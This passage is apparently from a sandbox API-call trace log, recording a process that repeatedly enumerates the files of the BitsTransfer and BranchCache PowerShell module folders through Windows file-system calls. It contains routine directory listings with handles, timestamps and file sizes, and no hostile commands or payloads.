ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0264.705] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0264.705] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0264.705] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.705] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0264.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.705] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0264.706] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0264.706] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.706] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.706] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0264.706] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0264.706] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0264.707] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.707] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.707] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.707] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.707] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0264.708] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.708] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.708] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.708] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0264.708] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0264.708] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.709] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0264.709] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0264.709] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.709] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.709] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0264.709] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.710] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.711] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0264.711] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.711] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.711] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0264.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.711] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.711] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0264.711] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0264.711] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.712] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.712] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0264.712] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0264.712] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0264.712] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, 